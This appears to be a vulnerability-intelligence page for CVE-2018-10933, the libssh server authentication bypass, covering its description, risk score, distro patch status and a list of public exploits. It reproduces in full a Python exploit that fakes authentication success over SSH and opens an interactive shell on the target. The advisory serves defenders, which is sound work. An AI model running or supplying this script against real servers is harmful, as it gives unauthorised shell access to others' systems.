VIR Vulnerability Intelligence Relay

CVE-2018-10933

critical
Published — · Modified —
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
10.0

Description

A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-45638 remote linux python · 1 KB
Dayanç Soyadlı · 2018-10-18

libSSH - Authentication Bypass

python exploit Source: Exploit-DB 
#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit


parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")

args = parser.parse_args()


def BypasslibSSHwithoutcredentials(hostname, port):
    
    sock = socket.socket()
    try:
        sock.connect((str(hostname), int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
  
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
    
        spawncmd = transport.open_session()
        spawncmd.invoke_shell()
        return 0
    
    except paramiko.SSHException as e:
        print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
        return 1
    except socket.error:
        print("Unable to connect.")
        return 1


def main():
    paramiko.util.log_to_file(args.logfile)
    try:
        hostname = args.host
        port = args.port
    except:
        parser.print_help()
        exit(1)
    BypasslibSSHwithoutcredentials(hostname, port)

if __name__ == '__main__':
    exit(main())
EDB-46307 remote linux verified
jas502n · 2018-10-20

LibSSH 0.7.6 / 0.8.4 - Unauthorized Access

Source code queued for fetch — refresh in a moment.

Metasploit modules

auxiliary_scanner/ssh/libssh_auth_bypass rank 300
libssh Authentication Bypass Scanner
Source fetch failed: fetch_error — view the original via the link above.

OS impact
suse SUSE Affected 1 release
VersionStatusFixed in
Affected
arch Arch Fixed 1 release
VersionStatusFixed in
Fixed 0.8.4-1
debian Debian Fixed 5 releases
VersionStatusFixed in
trixie Fixed 0.8.4-1
sid Fixed 0.8.4-1
forky Fixed 0.8.4-1
bullseye Fixed 0.8.4-1
bookworm Fixed 0.8.4-1

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.